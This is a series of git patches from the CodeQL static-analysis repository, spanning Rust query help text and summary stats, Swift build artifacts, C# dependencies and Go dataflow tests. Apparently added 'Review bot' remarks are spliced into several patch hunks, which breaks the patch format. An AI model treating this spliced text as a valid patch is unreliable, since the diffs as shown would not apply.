From f637b3b1f3588c4a80b6e4bc06941c1ffb20bb14 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 14:20:40 +0000 Subject: [PATCH 0883/1267] Apply suggestions from code review Co-authored-by: mc <42146119+mchammer01@users.noreply.github.com> --- .../queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp index f93c77e83f2..e24222e09fc 100644 --- a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.qhelp @@ -42,8 +42,8 @@

    - Instead we should use a strong modern algorithm. In this - case we have selected the 256-bit version of the AES + Instead, we should use a strong modern algorithm. In this + case, we have selected the 256-bit version of the AES algorithm.

    @@ -52,8 +52,8 @@ -
  • NIST, FIPS 140 Annex a: Approved Security Functions.
  • -
  • NIST, SP 800-131A: Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths.
  • +
  • NIST, FIPS 140 Annex A: Approved Security Functions.
  • +
  • NIST, SP 800-131A Revision 2: Transitioning the Use of Cryptographic Algorithms and Key Lengths.
  • OWASP: Cryptographic Storage Cheat Sheet - Algorithms.
  • From 263bd69636d9e1d2538eaeee9bfc8dd460ad3a17 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 15:00:41 +0100 Subject: [PATCH 0884/1267] Swift: fix artifact update infrastructure --- MODULE.bazel | 2 ++ swift/third_party/load.bzl | 12 ++++++++++++ swift/third_party/resources/BUILD.bazel | 8 +++++--- swift/third_party/resources/update.sh | 0 4 files changed, 19 insertions(+), 3 deletions(-) mode change 100644 => 100755 swift/third_party/resources/update.sh diff --git a/MODULE.bazel b/MODULE.bazel index ab54b44b6bb..9e3714e0967 100644 --- a/MODULE.bazel +++ b/MODULE.bazel @@ -96,7 +96,9 @@ use_repo( "binlog", "picosha2", "swift-prebuilt-linux", + "swift-prebuilt-linux-download-only", "swift-prebuilt-macos", + "swift-prebuilt-macos-download-only", "swift-resource-dir-linux", "swift-resource-dir-macos", ) diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 542eec4d9f9..9cdc16a85d2 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -47,6 +47,12 @@ def _load_prebuilt(plat): build_file = build, **override ) + + # this is for `//swift/third_party/resources:update-prebuilt-*` support + http_file( + name = name + "-download-only", + **override + ) else: lfs_archive( name = name, @@ -54,6 +60,12 @@ def _load_prebuilt(plat): build_file = build, ) + # unused, but saves us some bazel mod tidy dance when in override mode + lfs_files( + name = name + "-download-only", + srcs = ["//swift/third_party/resources:%s" % file], + ) + def _github_archive(*, name, repository, commit, build_file = None, sha256 = None): github_name = repository[repository.index("/") + 1:] maybe( diff --git a/swift/third_party/resources/BUILD.bazel b/swift/third_party/resources/BUILD.bazel index 8c26788e411..1677110df75 100644 --- a/swift/third_party/resources/BUILD.bazel +++ b/swift/third_party/resources/BUILD.bazel 
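Review bot: The new `http_file(name = name + "-download-only", **override)` in `_load_prebuilt` takes everything that pins the download from `override`, which is built above the hunk, so the hunk does not show whether a `sha256` is always passed. Because this repository is the source that the `update-prebuilt-*` targets copy into the LFS-tracked artifact, an unpinned fetch here would carry straight into the committed binary. I would state the dependency next to the rule, e.g. `# integrity comes from the sha256 in _override; update.sh copies this file into the LFS artifact`, and confirm that `override` cannot be built without a hash. The `lfs_files` fallback in the second hunk is described as unused, which the existing comment already covers.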
@@ -25,23 +25,25 @@ alias( name = "update-%s-%s" % (what, os), srcs = ["update.sh"], args = [ - "$(rlocationpath %s)" % what, + "$(rlocationpath %s)" % source, "$(rlocationpath %s)" % target, ], data = [ - what, + source, target, ], deps = ["//misc/bazel:sh_runfiles"], ) for os in _oses - for what, target in ( + for what, source, target in ( ( "prebuilt", + "@swift-prebuilt-%s-download-only//file" % os, "swift-prebuilt-%s.tar.zst" % os, ), ( "dir", + "@swift-resource-dir-%s//file" % os, "resource-dir-%s.zip" % os, ), ) diff --git a/swift/third_party/resources/update.sh b/swift/third_party/resources/update.sh old mode 100644 new mode 100755 From 926d65bceca9074a8bb0bad3cf0839036a375d2b Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 15:21:02 +0100 Subject: [PATCH 0885/1267] Swift: update LFS artifacts and remove override --- swift/third_party/load.bzl | 4 ---- swift/third_party/resources/resource-dir-linux.zip | 4 ++-- swift/third_party/resources/resource-dir-macos.zip | 4 ++-- swift/third_party/resources/swift-prebuilt-linux.tar.zst | 3 +++ swift/third_party/resources/swift-prebuilt-macos.tar.zst | 3 +++ 5 files changed, 10 insertions(+), 8 deletions(-) create mode 100644 swift/third_party/resources/swift-prebuilt-linux.tar.zst create mode 100644 swift/third_party/resources/swift-prebuilt-macos.tar.zst diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 9cdc16a85d2..455f7dfefee 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl 
@@ -5,10 +5,6 @@ load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") _override = { # these are used to test new artifacts. Must be empty before merging to main - "swift-prebuilt-macOS-swift-6.0.2-RELEASE-25.tar.zst": "4c81917da67ff2bb642ef2e34e005466b06f756c958702ec070bcacdb83c2f76", - "swift-prebuilt-Linux-swift-6.0.2-RELEASE-25.tar.zst": "af1e3355fb476538449424a74f15ce21a0f877c7f85a568e736f0bd6c0239a8f", - "resource-dir-macOS-swift-6.0.2-RELEASE-33.zip": "38f48790fea144b7cf5918b885f32a0f68e21aa5f3c2f0a5722573cc9e950639", - "resource-dir-Linux-swift-6.0.2-RELEASE-33.zip": "403374c72e20299951c2c37185404500d15340baaa52bb2d06f8815b03f8071e", } _staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{}/{}" diff --git a/swift/third_party/resources/resource-dir-linux.zip b/swift/third_party/resources/resource-dir-linux.zip index dc52894ec90..2c45df3aa03 100644 --- a/swift/third_party/resources/resource-dir-linux.zip +++ b/swift/third_party/resources/resource-dir-linux.zip @@ -1,3 +1,3 @@ version https://git-lfs.github.com/spec/v1 -oid sha256:02bf1b93c60917b09e5de24f7a3a96e109337fedb7ee1cc0c2409d829866dbfe -size 190645227 +oid sha256:403374c72e20299951c2c37185404500d15340baaa52bb2d06f8815b03f8071e +size 318874108 diff --git a/swift/third_party/resources/resource-dir-macos.zip b/swift/third_party/resources/resource-dir-macos.zip index cfc59553219..c358585ea65 100644 --- a/swift/third_party/resources/resource-dir-macos.zip +++ b/swift/third_party/resources/resource-dir-macos.zip @@ -1,3 +1,3 @@ version https://git-lfs.github.com/spec/v1 -oid sha256:8e29feb39124731510535f8d98be80bc68b10ff0e791c909c9ff96a9b97391fa -size 483440694 +oid sha256:38f48790fea144b7cf5918b885f32a0f68e21aa5f3c2f0a5722573cc9e950639 +size 653096176 diff --git a/swift/third_party/resources/swift-prebuilt-linux.tar.zst b/swift/third_party/resources/swift-prebuilt-linux.tar.zst new file mode 100644 index 00000000000..0a1fe2b3f4d --- /dev/null 
+++ b/swift/third_party/resources/swift-prebuilt-linux.tar.zst @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af1e3355fb476538449424a74f15ce21a0f877c7f85a568e736f0bd6c0239a8f +size 118694583 diff --git a/swift/third_party/resources/swift-prebuilt-macos.tar.zst b/swift/third_party/resources/swift-prebuilt-macos.tar.zst new file mode 100644 index 00000000000..f69024bd10d --- /dev/null +++ b/swift/third_party/resources/swift-prebuilt-macos.tar.zst @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c81917da67ff2bb642ef2e34e005466b06f756c958702ec070bcacdb83c2f76 +size 101405609 From d7d4658aaedba635fad11516c2dbe77b76b73c05 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 14:52:55 +0000 Subject: [PATCH 0886/1267] Rust: Add % of files extractor without errors to summary stats. --- rust/ql/src/queries/summary/SummaryStats.ql | 5 +++++ rust/ql/test/query-tests/diagnostics/SummaryStats.expected | 1 + 2 files changed, 6 insertions(+) diff --git a/rust/ql/src/queries/summary/SummaryStats.ql b/rust/ql/src/queries/summary/SummaryStats.ql index ffe7cbf1a8f..2e30fde143a 100644 --- a/rust/ql/src/queries/summary/SummaryStats.ql +++ b/rust/ql/src/queries/summary/SummaryStats.ql @@ -32,6 +32,11 @@ where key = "Files extracted - without errors" and value = count(SuccessfullyExtractedFile f | exists(f.getRelativePath())) or + key = "Files extracted - without errors %" and + value = + (count(SuccessfullyExtractedFile f | exists(f.getRelativePath())) * 100) / + count(ExtractedFile f | exists(f.getRelativePath())) + or key = "Lines of code extracted" and value = getLinesOfCode() or key = "Lines of user code extracted" and value = getLinesOfUserCode() diff --git a/rust/ql/test/query-tests/diagnostics/SummaryStats.expected b/rust/ql/test/query-tests/diagnostics/SummaryStats.expected index 9372843039c..a5295af6e10 100644 --- a/rust/ql/test/query-tests/diagnostics/SummaryStats.expected 
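Review bot: The new `Files extracted - without errors %` disjunct divides by `count(ExtractedFile f | exists(f.getRelativePath()))` with no guard for a zero count. As far as I know, QL integer division by zero yields no value, so on a database with no extracted source files the row would silently disappear instead of reporting a figure. The division is also integer division, so the percentage is rounded down (the expected output shows 57 for 4 of 7 files). A comment above the disjunct such as `// integer percentage, rounded down; no row is produced when no files were extracted` would make both behaviours explicit. The `where` clause continues outside the hunk.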
+++ b/rust/ql/test/query-tests/diagnostics/SummaryStats.expected @@ -5,6 +5,7 @@ | Files extracted - total | 7 | | Files extracted - with errors | 3 | | Files extracted - without errors | 4 | +| Files extracted - without errors % | 57 | | Inconsistencies - AST | 0 | | Inconsistencies - CFG | 0 | | Inconsistencies - data flow | 0 | From 4e079d34b9bc75efeda51f573d5626655e9581d8 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Dec 2024 15:55:30 +0100 Subject: [PATCH 0887/1267] C#: Clean up dependencies Newtonsoft.Json and dont override nowarn. --- csharp/autobuilder/Semmle.Autobuild.CSharp/BUILD.bazel | 1 - csharp/autobuilder/Semmle.Autobuild.CSharp/paket.references | 1 - .../Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel | 2 +- .../paket.references | 1 + 4 files changed, 2 insertions(+), 3 deletions(-) diff --git a/csharp/autobuilder/Semmle.Autobuild.CSharp/BUILD.bazel b/csharp/autobuilder/Semmle.Autobuild.CSharp/BUILD.bazel index 99cf29e5220..7ef9b1eb5b3 100644 --- a/csharp/autobuilder/Semmle.Autobuild.CSharp/BUILD.bazel +++ b/csharp/autobuilder/Semmle.Autobuild.CSharp/BUILD.bazel @@ -17,6 +17,5 @@ codeql_csharp_binary( "//csharp/extractor/Semmle.Extraction.CSharp.Standalone:bin/Semmle.Extraction.CSharp.Standalone", "//csharp/extractor/Semmle.Util", "@paket.main//microsoft.build", - "@paket.main//newtonsoft.json", ], ) diff --git a/csharp/autobuilder/Semmle.Autobuild.CSharp/paket.references b/csharp/autobuilder/Semmle.Autobuild.CSharp/paket.references index 53fe17d215e..ec65ce95b91 100644 --- a/csharp/autobuilder/Semmle.Autobuild.CSharp/paket.references +++ b/csharp/autobuilder/Semmle.Autobuild.CSharp/paket.references @@ -1,2 +1 @@ -Newtonsoft.Json Microsoft.Build diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel index 4be9954a274..8be8aaa8408 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel 
+++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel @@ -11,10 +11,10 @@ codeql_csharp_library( ]), allow_unsafe_blocks = True, internals_visible_to = ["Semmle.Extraction.Tests"], - nowarn = ["CA1822"], visibility = ["//csharp:__subpackages__"], deps = [ "//csharp/extractor/Semmle.Extraction.CSharp", "//csharp/extractor/Semmle.Util", + "@paket.main//newtonsoft.json", ], ) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/paket.references b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/paket.references index e69de29bb2d..99e44f5d76e 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/paket.references +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/paket.references @@ -0,0 +1 @@ +Newtonsoft.Json From 1935c26b568906b9544881864c0771bb28e9dfb3 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 14:15:41 +0000 Subject: [PATCH 0888/1267] Trivial variable name fixes --- .../semmle/go/dataflow/ExternalValueFlow/completetest.ql | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalValueFlow/completetest.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalValueFlow/completetest.ql index 372283d0a6c..efd5f0d5bb3 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalValueFlow/completetest.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalValueFlow/completetest.ql @@ -9,9 +9,9 @@ import semmle.go.dataflow.internal.FlowSummaryImpl as FlowSummaryImpl import TestUtilities.InlineFlowTest module Config implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node src) { sourceNode(src, "qltest") } + predicate isSource(DataFlow::Node source) { sourceNode(source, "qltest") } - predicate isSink(DataFlow::Node src) { sinkNode(src, "qltest") } + predicate isSink(DataFlow::Node sink) { sinkNode(sink, "qltest") } } import ValueFlowTest 
From ec7cbf93d9f887c932b1bb780eb104a04349da40 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 10:45:04 +0000 Subject: [PATCH 0889/1267] Add failing test for flow out of varargs parameter --- .../library-tests/semmle/go/dataflow/VarArgs/main.go | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgs/main.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgs/main.go index 8e3a498656a..84e76965980 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgs/main.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgs/main.go @@ -4,7 +4,7 @@ func source() string { return "untrusted data" } -func sink(string) { +func sink(any) { } type A struct { @@ -19,6 +19,10 @@ func functionWithVarArgsParameter(s ...string) string { return s[1] } +func functionWithVarArgsOutParameter(in string, out ...*string) { + *out[0] = in +} + func functionWithSliceOfStructsParameter(s []A) string { return s[1].f } @@ -38,6 +42,12 @@ func main() { sink(functionWithVarArgsParameter(sSlice...)) // $ hasValueFlow="call to functionWithVarArgsParameter" sink(functionWithVarArgsParameter(s0, s1)) // $ hasValueFlow="call to functionWithVarArgsParameter" + var out1 *string + var out2 *string + functionWithVarArgsOutParameter(source(), out1, out2) + sink(out1) // $ MISSING: hasValueFlow="out1" + sink(out2) // $ MISSING: hasValueFlow="out2" + sliceOfStructs := []A{{f: source()}} sink(sliceOfStructs[0].f) // $ hasValueFlow="selection of f" From 69f087a46d582772686e2d075d7ed2e5bc5e19bf Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 13:17:18 +0000 Subject: [PATCH 0890/1267] Fix pre-existing failing test in VarArgsWithFunctionModels It was failing for a silly reason. --- .../go/dataflow/VarArgsWithFunctionModels/main.go | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) 
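Review bot: In the last hunk `out1` and `out2` are declared as nil `*string` values and passed to `functionWithVarArgsOutParameter`, whose body is `*out[0] = in`, so the program would panic on a nil dereference if it were ever executed rather than only extracted. Declaring them as `out1 := new(string)` and `out2 := new(string)` keeps the test shape and makes the write well-defined. The `MISSING: hasValueFlow="out2"` expectation also needs a comment, since only element 0 is written and flow to `out2` is expected only if element content is not tracked per index, e.g. `// flow to out2 is expected because array content is index-insensitive`.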
diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go index c561de0da2f..f7248f1f6a2 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go @@ -21,10 +21,11 @@ func main() { s0 := "" s1 := source() sSlice := []string{s0, s1} - sink(test.FunctionWithParameter(sSlice[1])) // $ hasValueFlow="call to FunctionWithParameter" - sink(test.FunctionWithSliceParameter(sSlice)) // $ hasTaintFlow="call to FunctionWithSliceParameter" MISSING: hasValueFlow="call to FunctionWithSliceParameter" - sink(test.FunctionWithVarArgsParameter(sSlice...)) // $ hasTaintFlow="call to FunctionWithVarArgsParameter" MISSING: hasValueFlow="call to FunctionWithVarArgsParameter" - sink(test.FunctionWithVarArgsParameter(s0, s1)) // $ MISSING: hasValueFlow="call to FunctionWithVarArgsParameter" + sink(test.FunctionWithParameter(sSlice[1])) // $ hasValueFlow="call to FunctionWithParameter" + sink(test.FunctionWithSliceParameter(sSlice)) // $ hasTaintFlow="call to FunctionWithSliceParameter" MISSING: hasValueFlow="call to FunctionWithSliceParameter" + sink(test.FunctionWithVarArgsParameter(sSlice...)) // $ hasTaintFlow="call to FunctionWithVarArgsParameter" MISSING: hasValueFlow="call to FunctionWithVarArgsParameter" + randomFunctionWithMoreThanOneParameter(1, 2, 3, 4, 5) // This is needed to make the next line pass, because we need to have seen a call to a function with at least 2 parameters for ParameterInput to exist with index 1. + sink(test.FunctionWithVarArgsParameter(s0, s1)) // $ hasValueFlow="call to FunctionWithVarArgsParameter" sliceOfStructs := []test.A{{Field: source()}} sink(sliceOfStructs[0].Field) // $ hasValueFlow="selection of Field" 
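Review bot: The call `randomFunctionWithMoreThanOneParameter(1, 2, 3, 4, 5)` makes the next expectation pass by changing what the test database contains, and the reason is given only in a long trailing comment on the call. The helper defined in the later hunk has no comment, so someone tidying the file could delete it as dead code and silently bring back the `MISSING` result. I would put the explanation on the definition, e.g. `// Keeps a call with at least two arguments in the database so that ParameterInput index 1 exists; do not remove.` The name could also say what the function is for rather than `random`.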
@@ -37,3 +38,6 @@ func main() {
 sink(test.FunctionWithVarArgsOfStructsParameter(aSlice...)) // $ MISSING: hasValueFlow="call to FunctionWithVarArgsOfStructsParameter"
 sink(test.FunctionWithVarArgsOfStructsParameter(a0, a1)) // $ MISSING: hasValueFlow="call to FunctionWithVarArgsOfStructsParameter"
 }
+
+func randomFunctionWithMoreThanOneParameter(i1, i2, i3, i4, i5 int) {
+}
From 1612a7a9a07a1f8f78c9a158622e133675622ad2 Mon Sep 17 00:00:00 2001
From: Owen Mansel-Chan
Date: Fri, 6 Dec 2024 13:40:08 +0000
Subject: [PATCH 0891/1267] Delete accidentally committed binary
---
 .../semmle.go.Packages | Bin 1142176 -> 0 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100755 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/semmle.go.Packages
diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/semmle.go.Packages b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/semmle.go.Packages deleted file mode 100755 index e3880ac8d5d9d893c3ee41a8c4aafe2702f1a859..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1142176 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 